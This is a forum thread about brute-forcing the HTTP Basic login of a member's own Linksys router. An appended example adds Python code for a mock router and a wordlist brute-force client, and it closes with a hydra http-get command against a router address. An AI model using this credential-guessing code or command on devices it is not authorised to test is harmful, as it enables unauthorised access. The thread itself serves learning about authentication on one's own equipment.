
Thread: Trying to bruteforce my linksys wireless router

#1 Member: Trying to bruteforce my linksys wireless router

Once I connect to my Linksys BEFW11S4 V4 wireless router via a wireless card, I can view the router's web page. It prompts me for a user name and password. I'm going to use this tutorial
    Code:
    http://forums.remote-exploit.org/showthread.php?t=14910
    to get some experience on how to fully utilize hydra.

Anyhow, I'm trying to find a way to get the source code of that login popup so that I can see the form and action of how the login script works. I'm using Firefox 3, but I can't view the source because the login popup is modal, meaning that I can't click on anything else until I complete the login popup. I've taken a look at the source of the router's main web page (where all the router settings are). I'm assuming that this page is the index.html. Anyhow, there's nothing that resembles the code of the login popup. I'm sure the login script would be a separate file. I tried other stuff, like lynx [router ip] -source > source.html, but I am unable to extract the source.

    What other ways are there to get the source of that login popup?

#2 Moderator KMDave

Wireshark. It might not be as comfortable as other tools, but you will definitely get it.
    Tiocfaidh ár lá

#3 Good friend of the forums

* The login popup is HTTP Basic auth; it's not HTML.
http://en.wikipedia.org/wiki/Basic_a...authentication
* You don't need the source to use hydra unless it's a POST-based auth page (in your case this is Basic auth, not POST auth).

#4 Good friend of the forums williamc (Chico CA)

    I've used Hydra and Medusa extensively. I'd try using Bruter instead to view your page source:
    http://sourceforge.net/project/platf...roup_id=204020

    It's Windows based, but you should be able to run it in Wine. It will populate your username and password fields for you.

    William

#5 Member

Nice, I used Wireshark to see the type of authentication. In the packet after the 3-way handshake, under the Authorization tab, it straight out said "Basic" and then had a Base64 string, which was the encrypted text of the credentials I entered. I fired up Bruter in a Windows virtual machine and it worked like a charm.

I was examining the packets in Wireshark. I noticed that after the 3-way handshake, there was a GET / HTTP/1.1. In the same packet, under the HTTP section of the packet, were my credentials. Then there were two packets, I'm guessing one for ACK, and one said "rebuilding PDU". Then I get the packet that contains the unauthorized HTML page from the target. The authentication method was HTTP Basic HEAD.

Now if this were HTTP Basic GET, how would the packet structure be different? How would I distinguish between the two, HTTP Basic HEAD and HTTP Basic GET? It seemed that in this situation (HTTP Basic HEAD), in the packet after the 3-way handshake I get the HTTP from the target, and in that same packet I include the credentials. So it seems to make sense that this would be HTTP Basic HEAD.

#6 Just burned his ISO

    An easier way might be to just telnet to the site and do a:

    GET / HTTP/1.0
    <return>
    <return>

    ?
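Added example, not part of the thread and not anyone's posted code: a mock of a router admin page that uses HTTP Basic auth, plus a raw-socket client that sends the bare GET / HTTP/1.0 request from post #6, reads the 401 challenge described in posts #3 and #5 (WWW-Authenticate: Basic realm=...), and then walks a small wordlist sending Authorization: Basic base64(user:pass) on each try, which is what hydra's http-get module does. The credentials, realm and wordlist are constructed for the example; a real BEFW11S4 has its own defaults and IP.

```python
"""Mock HTTP Basic-auth target and a raw GET / brute-force client.
Added example; credentials, realm, port and wordlist are all constructed."""
import base64
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed target credentials (assumption for the example only).
TARGET_USER = "admin"
TARGET_PASS = "letmein"
REALM = "Linksys BEFW11S4 V4"  # constructed realm string


def basic_header(user, password):
    """Authorization header value: 'Basic ' + base64('user:pass').
    Base64 is an encoding, not encryption: anyone who sniffs it decodes it."""
    token = base64.b64encode("{}:{}".format(user, password).encode()).decode()
    return "Basic " + token


def decode_basic(header_value):
    """Reverse of basic_header(): what Wireshark shows as the credentials."""
    scheme, _, token = header_value.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not Basic auth")
    user, _, password = base64.b64decode(token).decode().partition(":")
    return user, password


class RouterHandler(BaseHTTPRequestHandler):
    """Mock admin page: 401 + WWW-Authenticate challenge until the right
    Authorization header arrives, then 200 with the settings page."""
    protocol_version = "HTTP/1.0"

    def do_GET(self):
        auth = self.headers.get("Authorization", "")
        try:
            ok = decode_basic(auth) == (TARGET_USER, TARGET_PASS)
        except ValueError:
            ok = False
        if ok:
            body = b"<html>Setup page</html>"
            self.send_response(200)
        else:
            body = b"<html>401 Unauthorized</html>"
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="%s"' % REALM)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the example quiet
        pass


def start_mock_router():
    """Start the mock on an ephemeral loopback port; returns (host, port)."""
    srv = HTTPServer(("127.0.0.1", 0), RouterHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv.server_address[0], srv.server_address[1]


def raw_get(host, port, auth=None):
    """The telnet exchange from post #6 over a socket: send 'GET / HTTP/1.0',
    optionally with an Authorization line, and return (status, headers)."""
    req = "GET / HTTP/1.0\r\n"
    if auth:
        req += "Authorization: %s\r\n" % auth
    req += "\r\n"  # blank line ends the request, as the two <return>s do
    with socket.create_connection((host, port)) as s:
        s.sendall(req.encode())
        raw = b""
        while True:  # HTTP/1.0 server closes the connection after the reply
            chunk = s.recv(4096)
            if not chunk:
                break
            raw += chunk
    head = raw.partition(b"\r\n\r\n")[0].decode()
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def brute_force(host, port, users, passwords):
    """Try every user:pass pair until the server answers 200; None if none fit."""
    for u in users:
        for p in passwords:
            status, _ = raw_get(host, port, basic_header(u, p))
            if status == 200:
                return u, p
    return None


if __name__ == "__main__":
    host, port = start_mock_router()
    status, hdrs = raw_get(host, port)
    print(status, hdrs.get("www-authenticate"))
    print(brute_force(host, port, ["admin"], ["password", "1234", "letmein"]))
```

The first unauthenticated raw_get() call returns the 401 and the WWW-Authenticate header; that header, not any HTML form, is what tells you the page is Basic auth, so there is no login form source to recover. Against a real router the same wordlist walk is the standard hydra http-get invocation, for example hydra -l admin -P wordlist.txt 192.168.1.1 http-get / (address and file are placeholders).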
